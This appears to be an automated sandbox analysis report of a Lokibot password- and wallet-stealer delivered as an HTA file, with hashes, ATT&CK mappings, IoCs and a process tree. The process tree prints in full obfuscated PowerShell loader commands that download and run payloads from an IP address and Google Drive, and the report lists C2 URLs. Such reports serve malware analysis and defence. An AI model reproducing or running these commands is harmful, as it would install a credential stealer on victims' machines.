lokibot | 86f7ef2ea14259c52d1fe1627978ef45a94fc4234c7328a1492da55a400703d6

Analysis

max time kernel
146s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-10-2024 12:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta
Size

131KB
MD5

196fb761aa0f295e150b75bd8ad638b4
SHA1

c209ef825b7f80e43f3c904efbc2df582117eeb0
SHA256

86f7ef2ea14259c52d1fe1627978ef45a94fc4234c7328a1492da55a400703d6
SHA512

38b7eaff75c6d2cc3b5da4ebb6c345247d35d44b29804c67227404942075db9abf6466716122be3cc4bcb7c8188e0aa3c3b69d9459fd1cff8f5177eaae028b85
SSDEEP

96:4vCt7evwlevO+D4xMUrwKtkTt0cZPeIvdDveRAz5hg3vBQ:4vCFUWUiXwK2TpSbBQ

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

http://94.156.177.220/logs/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Blocklisted process makes network request 4 IoCs

Processes:

poWERSHELl.eXEpowershell.exe

flow pid process

16 2716 poWERSHELl.eXE
25 3616 powershell.exe
29 3616 powershell.exe
35 3616 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2296 powershell.exe
3616 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

poWERSHELl.eXEpowershell.exe

pid process

2716 poWERSHELl.eXE
4744 powershell.exe

flow	pid	process
16	2716	poWERSHELl.eXE
25	3616	powershell.exe
29	3616	powershell.exe
35	3616	powershell.exe

pid	process
2296	powershell.exe
3616	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

CasPol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	CasPol.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	CasPol.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	CasPol.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

24 drive.google.com
25 drive.google.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3616 set thread context of 3544 3616 powershell.exe CasPol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
24	drive.google.com
25	drive.google.com

description	pid	process	target process
PID 3616 set thread context of 3544	3616	powershell.exe	CasPol.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exepowershell.exemshta.exepoWERSHELl.eXEpowershell.execsc.execvtres.exeWScript.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	poWERSHELl.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies registry class 1 IoCs

Processes:

poWERSHELl.eXE

description ioc process

Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings poWERSHELl.eXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	poWERSHELl.eXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

poWERSHELl.eXEpowershell.exepowershell.exepowershell.exe

pid	process
2716	poWERSHELl.eXE
2716	poWERSHELl.eXE
4744	powershell.exe
4744	powershell.exe
2296	powershell.exe
2296	powershell.exe
3616	powershell.exe
3616	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

poWERSHELl.eXEpowershell.exepowershell.exepowershell.exeCasPol.exe

description	pid	process
Token: SeDebugPrivilege	2716	poWERSHELl.eXE
Token: SeDebugPrivilege	4744	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	3544	CasPol.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

mshta.exepoWERSHELl.eXEcsc.exeWScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4280 wrote to memory of 2716	4280	mshta.exe	poWERSHELl.eXE
PID 4280 wrote to memory of 2716	4280	mshta.exe	poWERSHELl.eXE
PID 4280 wrote to memory of 2716	4280	mshta.exe	poWERSHELl.eXE
PID 2716 wrote to memory of 4744	2716	poWERSHELl.eXE	powershell.exe
PID 2716 wrote to memory of 4744	2716	poWERSHELl.eXE	powershell.exe
PID 2716 wrote to memory of 4744	2716	poWERSHELl.eXE	powershell.exe
PID 2716 wrote to memory of 2760	2716	poWERSHELl.eXE	csc.exe
PID 2716 wrote to memory of 2760	2716	poWERSHELl.eXE	csc.exe
PID 2716 wrote to memory of 2760	2716	poWERSHELl.eXE	csc.exe
PID 2760 wrote to memory of 4496	2760	csc.exe	cvtres.exe
PID 2760 wrote to memory of 4496	2760	csc.exe	cvtres.exe
PID 2760 wrote to memory of 4496	2760	csc.exe	cvtres.exe
PID 2716 wrote to memory of 640	2716	poWERSHELl.eXE	WScript.exe
PID 2716 wrote to memory of 640	2716	poWERSHELl.eXE	WScript.exe
PID 2716 wrote to memory of 640	2716	poWERSHELl.eXE	WScript.exe
PID 640 wrote to memory of 2296	640	WScript.exe	powershell.exe
PID 640 wrote to memory of 2296	640	WScript.exe	powershell.exe
PID 640 wrote to memory of 2296	640	WScript.exe	powershell.exe
PID 2296 wrote to memory of 3616	2296	powershell.exe	powershell.exe
PID 2296 wrote to memory of 3616	2296	powershell.exe	powershell.exe
PID 2296 wrote to memory of 3616	2296	powershell.exe	powershell.exe
PID 3616 wrote to memory of 3544	3616	powershell.exe	CasPol.exe
PID 3616 wrote to memory of 3544	3616	powershell.exe	CasPol.exe
PID 3616 wrote to memory of 3544	3616	powershell.exe	CasPol.exe
PID 3616 wrote to memory of 3544	3616	powershell.exe	CasPol.exe
PID 3616 wrote to memory of 3544	3616	powershell.exe	CasPol.exe
PID 3616 wrote to memory of 3544	3616	powershell.exe	CasPol.exe
PID 3616 wrote to memory of 3544	3616	powershell.exe	CasPol.exe
PID 3616 wrote to memory of 3544	3616	powershell.exe	CasPol.exe
PID 3616 wrote to memory of 3544	3616	powershell.exe	CasPol.exe

outlook_office_path 1 IoCs

Processes:

CasPol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	CasPol.exe

outlook_win_path 1 IoCs

Processes:

CasPol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	CasPol.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthignswhichgivingbestthingstogetmakeuveryhappy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4280
- C:\Windows\SysWOW64\WinDOWSpoWErSheLl\v1.0\poWERSHELl.eXE
  "C:\Windows\systEm32\WinDOWSpoWErSheLl\v1.0\poWERSHELl.eXE" "PoWeRSheLL -EX bYPAsS -nOp -W 1 -c DeVIcECRedenTiAlDEploymeNT.eXe ; iex($(Iex('[SYsTeM.TeXt.ENCODinG]'+[chAR]58+[chAR]58+'UTF8.geTStRING([SysteM.CONVERT]'+[CHAR]0x3a+[cHAr]0X3A+'fRomBaSe64STring('+[ChAr]34+'JEREICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlckRlZkluaXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGR0Vkh5Zm5wRUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVnZ3cXksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNvSVVxaVgsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdm0pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMZkJpeHBhTVFhSiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVVUTURZQ2tkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRERDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMy9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzdG9oYXBwZW5lZC50SUYiLCIkRW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc3RvaGFwcC52YlMiLDAsMCk7c1RhUlQtc2xFZVAoMyk7U1RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3N0b2hhcHAudmJTIg=='+[CHAr]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -nOp -W 1 -c DeVIcECRedenTiAlDEploymeNT.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4744
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rviy52hn\rviy52hn.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBCD8.tmp" "c:\Users\Admin\AppData\Local\Temp\rviy52hn\CSC64B7E8E473C44A3BBC9943D7FA16D8.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4496
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithgreatnewswithgoodthingstohapp.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:640
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnR1ZDaW1hZ2VVcmwnKycgPSBTcHJodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd24nKydsbycrJ2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciBTcHI7R1ZDd2ViQ2xpJysnZW4nKyd0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHVkNpbWFnZUJ5dGVzID0nKycgR1ZDd2ViQ2xpZW50LkRvd24nKydsb2FkJysnRGF0YScrJyhHVkNpbWFnZVVybCknKyc7R1ZDaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoR1ZDaW1hZycrJ2VCeXRlcyk7R1YnKydDc3RhcnRGbGFnID0gU3ByPDxCQVNFNjRfU1RBUlQ+PlNwcjtHVkNlbmRGbGFnID0gU3ByPCcrJzxCQVNFNjRfRU5EPj5TcHI7R1ZDc3RhcnRJbmRleCA9IEdWQ2ltYWdlVGV4dC5JbicrJ2RleE9mKEdWQ3N0YXJ0RmxhZyk7R1ZDZW5kSW5kZXggPSBHVkNpJysnbWFnZVRleHQuSW5kZXhPZihHVkNlbmRGbGFnKTtHVkNzdGFydEluZGUnKyd4IC1nZSAwIC1hbmQgR1ZDZScrJ25kSW5kZXggLWd0IEdWQ3MnKyd0YXJ0SW5kZXg7R1ZDc3RhcnRJbmRleCArPSBHVkNzdGFydEZsYWcuTGVuZ3RoO0dWQ2Jhc2U2NExlbmd0aCA9IEdWQ2VuZEluZGV4IC0gR1ZDc3RhcicrJ3RJbmRleDtHVkNiYXNlNjRDb21tYW5kID0gR1ZDaW1hZ2VUZXh0JysnLlN1YnN0cmluZycrJyhHVkNzdGFydEluZGV4LCBHVkNiYXNlNjRMZW5ndGgpO0dWQ2Jhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEdWQ2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBUMHggRm9yRWFjaC1PYmplY3QgeyBHJysnVkNfIH0pWy0xLi4tKEdWQ2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07R1ZDYycrJ29tbWFuZEJ5dGVzID0gW1N5cycrJ3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZyhHVkNiYXNlNjRSZXZlcnNlZCk7R1ZDbG9hZGVkQXNzZW1ibHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZScrJ21ibHldOjpMb2FkKEdWQ2NvbW1hbmRCeXRlcyk7R1ZDdmFpJysnTWV0aG9kID0gW2RuJysnbGliLklPLkhvbWVdLkdldE1ldGhvZChTcHJWQUlTcHIpO0dWQ3ZhaU1ldGhvZC5JbnZva2UoR1ZDbnVsbCwgQChTcHJ0eHQuU0dPTEtMLzMyNC81NTEuODcxLjY0Ljg5MS8vOnB0dGhTcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwcmRlc2F0aXZhZG9TcHIsIFNwckNhc1BvbFNwciwgUycrJ3ByZGVzYXRpdmFkb1NwciwgU3ByZGUnKydzYXRpJysndmFkb1NwcixTcHJkZXNhdGl2YWRvU3ByLFNwJysncmRlc2F0aScrJ3ZhZG9TcHIsU3ByZGVzYXRpdmFkb1NwcixTcHJkZXNhdGl2YWRvU3ByLFNwcmRlc2F0aXZhZG9TcHIsJysnU3ByMVNwcixTcHJkZXNhdGl2YWRvU3ByKSk7JykgLWNyRVBMQWNFIChbY2hhcl04NCtbY2hhcl00OCtbY2hhcl0xMjApLFtjaGFyXTEyNCAtUkVwbGFjZSAoW2NoYXJdNzErW2NoYXJdODYrW2NoYXJdNjcpLFtjaGFyXTM2ICAtY3JFUExBY0UgKFtjaGFyXTgzK1tjaGFyXTExMitbY2hhcl0xMTQpLFtjaGFyXTM5KSB8IElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2296
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('GVCimageUrl'+' = Sprhttps://drive.google.com/uc?export=down'+'lo'+'ad&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur Spr;GVCwebCli'+'en'+'t = New-Object System.Net.WebClient;GVCimageBytes ='+' GVCwebClient.Down'+'load'+'Data'+'(GVCimageUrl)'+';GVCimageText = [System.Text.Encoding]::UTF8.GetString(GVCimag'+'eBytes);GV'+'CstartFlag = Spr<<BASE64_START>>Spr;GVCendFlag = Spr<'+'<BASE64_END>>Spr;GVCstartIndex = GVCimageText.In'+'dexOf(GVCstartFlag);GVCendIndex = GVCi'+'mageText.IndexOf(GVCendFlag);GVCstartInde'+'x -ge 0 -and GVCe'+'ndIndex -gt GVCs'+'tartIndex;GVCstartIndex += GVCstartFlag.Length;GVCbase64Length = GVCendIndex - GVCstar'+'tIndex;GVCbase64Command = GVCimageText'+'.Substring'+'(GVCstartIndex, GVCbase64Length);GVCbase64Reversed = '+'-join (GVCbase64Command.ToCharArray() T0x ForEach-Object { G'+'VC_ })[-1..-(GVCbase64Command.Length)];GVCc'+'ommandBytes = [Sys'+'t'+'em.Convert]::FromBas'+'e64String(GVCbase64Reversed);GVCloadedAssembly = '+'[System.Reflection.Asse'+'mbly]::Load(GVCcommandBytes);GVCvai'+'Method = [dn'+'lib.IO.Home].GetMethod(SprVAISpr);GVCvaiMethod.Invoke(GVCnull, @(Sprtxt.SGOLKL/324/551.871.64.891//:ptthSpr, SprdesativadoSpr, SprdesativadoSpr, SprdesativadoSpr, SprCasPolSpr, S'+'prdesativadoSpr, Sprde'+'sati'+'vadoSpr,SprdesativadoSpr,Sp'+'rdesati'+'vadoSpr,SprdesativadoSpr,SprdesativadoSpr,SprdesativadoSpr,'+'Spr1Spr,SprdesativadoSpr));') -crEPLAcE ([char]84+[char]48+[char]120),[char]124 -REplace ([char]71+[char]86+[char]67),[char]36 -crEPLAcE ([char]83+[char]112+[char]114),[char]39) | Iex"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3616
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\poWERSHELl.eXE.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
cddc53201c1f434808baaeb78ff9d5f6

SHA1
4cc5ef46d586eadd29ca7a41997c8bb600e3c736

SHA256
be28499076332e43225ba1ec09e640ad5068e825f77b0e7cb74a2248ee225d33

SHA512
3fa3e0478aa2baa1c327566bcb71f2bcb5293402c745a9132d6454b722246cd05987f62b7a6cf67a6370737942ee92b387ba5f214b4f4b7b298f71f8c7292824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5e07fd4e327f408a7fea600872afb9a3

SHA1
3adc27ffecd85875887d3de509cb1bea365250ab

SHA256
2d84a93a14e8fcca1839d403e475eb9e897c24ba5e4107cd45e28bdd431442b7

SHA512
f044f03bde763874a595c4caeb70f49bc82417094b48d71bbf61ee3f2e5fff8c88fc0d8e9657b55558df16d1f15a66730f7406a8f54035a74b2bb8ec355fc732

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBCD8.tmp

Filesize
1KB

MD5
1773068e57c90217d87c6daeb7d33c40

SHA1
38f46975fea559d8a514cce7fa00c50be456afe9

SHA256
9171c3233372b6258f3a52dcf40ddf8f26e14e9d289b059affa61cd4bb429d7b

SHA512
38c23f764c37d583bca4f4cbdeac7b67e3259496169e70944e413ba53b4f60b2e2260746fa002c45494bf260071e25adb5c6ebfc9a12c8ff7de172cf23a45648

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqcupnmt.bsf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rviy52hn\rviy52hn.dll

Filesize
3KB

MD5
a76f6412b13101ebe12541f206064c62

SHA1
b837348cc3737b6b5a4e77f8679641ba368e7f51

SHA256
18f7b7b54757456a2baebfaf0dd513d046b5cf84e565a677322b589ce52e088b

SHA512
c24de1e0920180f26589ae4fcfbe748ddfc37e8c46be732108172a665217f157044fdd9820b2f9abb0b97e5cd1cd5360b75e6e803d7e80357b2290b0e2038dd6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-940901362-3608833189-1915618603-1000\0f5007522459c86e95ffcc62f32308f1_f2cdb6fb-4ab8-4547-9f25-fad1f7a44351

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-940901362-3608833189-1915618603-1000\0f5007522459c86e95ffcc62f32308f1_f2cdb6fb-4ab8-4547-9f25-fad1f7a44351

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\picturewithgreatnewswithgoodthingstohapp.vbS

Filesize
136KB

MD5
e7dde34531d98d4b94175ad3269d5667

SHA1
fa9596b284c756bcf9a14dc5ebc2b84607d398ae

SHA256
1d85e569b13244ff1ef054cec322a314c9880567b511b6ee817068c0dcd5d38b

SHA512
d39505a3951fd19c3809a0640218d39414bfb9efcc0d1c534ee5d9a4d17ddbcf7d3ad40d255a6e8a58d259e7ce61ac9f16e3d55b17d674eadb68997b551b4843

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rviy52hn\CSC64B7E8E473C44A3BBC9943D7FA16D8.TMP

Filesize
652B

MD5
3960cd0772d0cb4a568c68206cc05a45

SHA1
30cc6f4d3e7a45ef4eb0c4680f339ec605dbebeb

SHA256
c9b1649d892f6b5f068ff1367818f49b31b96f2b21004aba707f025964c99176

SHA512
00320ad4a7131bf9c8d8cfaf6520ef4e239a41ed3d17ffd934e29efa8a31e23b2ae7f8f8ce5c04bd9c582840b99c907d657f6f316a87b60ccd609dd130aa5f7d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rviy52hn\rviy52hn.0.cs

Filesize
462B

MD5
c3b2cac94b16f2aa7b62978b69741a03

SHA1
24b7bd8cf3a07a364bd91c2581a9a67cb25c8e3e

SHA256
a1d1f69141b09c2027c3ecf1b0eeb0b0d2a1ee67ee96436591461acd6f1b9d20

SHA512
3f4ab831992c6ffce0b348f105d13bea0ebdabe992d9d4283ba8671069529acb9e8fa8f3ec227aef6ce7f6180309dea4823b82f9cd78f94e5081f3d748fa0cb7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rviy52hn\rviy52hn.cmdline

Filesize
369B

MD5
08ead984a79bbe51acc7761ef6f5ab95

SHA1
7faaf5c049811244d493c07311133bf90399a46a

SHA256
53b92d888a637f6bc93f1c5cd2008b11e6ec69b727e21baf387e7de965f2757e

SHA512
7b54dfdb5221d006c0f4c7b292cb4b0c8dbd0e7adff5da2673538440554d0b8db1e1e49ecb1283ba93d7d24adde18385290d2b377b098e7645e89d974a7b55d6

Download Submit
memory/2296-91-0x0000000005FF0000-0x0000000006344000-memory.dmp

Filesize
3.3MB

Download
memory/2716-17-0x0000000005B50000-0x0000000005EA4000-memory.dmp

Filesize
3.3MB

Download
memory/2716-65-0x0000000006700000-0x0000000006708000-memory.dmp

Filesize
32KB

Download
memory/2716-1-0x0000000004B80000-0x0000000004BB6000-memory.dmp

Filesize
216KB

Download
memory/2716-0-0x000000007097E000-0x000000007097F000-memory.dmp

Filesize
4KB

Download
memory/2716-19-0x0000000006190000-0x00000000061DC000-memory.dmp

Filesize
304KB

Download
memory/2716-74-0x0000000070970000-0x0000000071120000-memory.dmp

Filesize
7.7MB

Download
memory/2716-73-0x000000007097E000-0x000000007097F000-memory.dmp

Filesize
4KB

Download
memory/2716-72-0x00000000083D0000-0x0000000008974000-memory.dmp

Filesize
5.6MB

Download
memory/2716-71-0x0000000007510000-0x0000000007532000-memory.dmp

Filesize
136KB

Download
memory/2716-18-0x0000000006140000-0x000000000615E000-memory.dmp

Filesize
120KB

Download
memory/2716-81-0x0000000070970000-0x0000000071120000-memory.dmp

Filesize
7.7MB

Download
memory/2716-7-0x0000000005AE0000-0x0000000005B46000-memory.dmp

Filesize
408KB

Download
memory/2716-6-0x0000000005A70000-0x0000000005AD6000-memory.dmp

Filesize
408KB

Download
memory/2716-5-0x0000000005290000-0x00000000052B2000-memory.dmp

Filesize
136KB

Download
memory/2716-4-0x0000000070970000-0x0000000071120000-memory.dmp

Filesize
7.7MB

Download
memory/2716-3-0x00000000052D0000-0x00000000058F8000-memory.dmp

Filesize
6.2MB

Download
memory/2716-2-0x0000000070970000-0x0000000071120000-memory.dmp

Filesize
7.7MB

Download
